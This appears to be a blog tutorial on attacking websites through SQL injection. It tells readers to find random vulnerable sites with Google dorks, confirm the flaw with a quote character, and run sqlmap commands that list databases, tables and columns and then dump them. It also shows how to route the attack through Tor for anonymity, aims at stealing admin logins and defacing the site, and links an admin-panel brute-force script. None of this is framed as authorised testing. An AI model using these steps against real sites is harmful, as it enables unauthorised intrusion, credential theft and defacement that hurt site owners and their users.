We all know websites need a database to store data. That is called s RDBMS – relational database management system. These databases store data in tables and columns so that it can be accessed easily. Server side languages like PHP can interact with SQL database with proper authentication and has read/write permission. Most of the sensitive information are stored in these databases like login credential. Hackers first preference is to take down a database so that he can login to the admin panel with the credentials he retrieved.
Sql injection is a method of exploiting a vulnerability in a server side script. Scripts that do not filter special chars properly are vulnerable to this attack. If a non filtered string is allowed to be in the query the string get executed as a query. This way of injecting custom crafted queries into a script is called sql injection.
consider a scenario: a php script that accepts a get parameter “name” and the script searches a table in a databse (eg url : www.example.com/search.php?name=bill).
The query looks like this
SELECT * FROM ‘profiles’ WHERE name = ‘bill’;
If you add a single quote at the end of the url
the query get executed like this :
SELECT * FROM ‘profiles’ WHERE name = ‘bill ‘ ‘;
This will give you a syntax error, this means the target is vulnerable. instead of the single quote we inject our custom queries to fetch the sensitive data.
Finding a target
You can randomly choose a target by google dorks. In the google search bar try the keyword:
you will get plenty of results, choose a target and open the url by adding a quote at the end. If the website shows a syntax error or a blank page the site is most probably vulnerable. Copy the target url to the clipboard. There are plenty other dorks try that too.
Sqlmap is a python script exclusively designed for database attacks. Its very stable and have too many options. So lets start.
# sqlmap -u http://target.com/vuln.php?id=1 –dbs
This is the first step. Sqlmap will scan the given parameter for all possible injection technique. Once you get a possible method sqlmap will ask whether you want to scan for more vulnerabilities. You can stop or continue, thats up to you. since we gave the “–dbs” option, sqlmap will retrieve the database names. Once you get the database name you can fetch tables and columns
# sqlmap -u http://target.com/vuln.php?id=1 -D database_name –tables
After fetching database and tables, fetch columns
# sqlmap -u http://target.com/vuln.php?id=1 -D database_name -T table_name –columns
Dump the data from the columns
# sqlmap -u http://target.com/vuln.php?id=1 -D database_name -T table_name -C column_name –dump
Sql map can be used with tor proxy for safe and anonymous attack
# sqlmap –tor –check-tor –tor-type=SOCKS5 -u http://target.com/vuln.php?id=1 –dbs
Increase the speed using multi-threading
# sqlmap –threads 10 -u http://target.com/vuln.php?id=1 –dbs
This will help you to get the admin login details. You can access to the control panel and deface the whole website. I have designed a simple script to find admin panel of a website. Download cpsan.py
from GitHub. click here
or directly clone by the command
# git-clone https://github.com/susmithHCK/cpscan.git
This python script bruteforce all the possible directories of a server and detects control panel by http response codes. This can detect almost 85% of websites. Hope this helped you guys. Any doubts or questions please use the comment box below.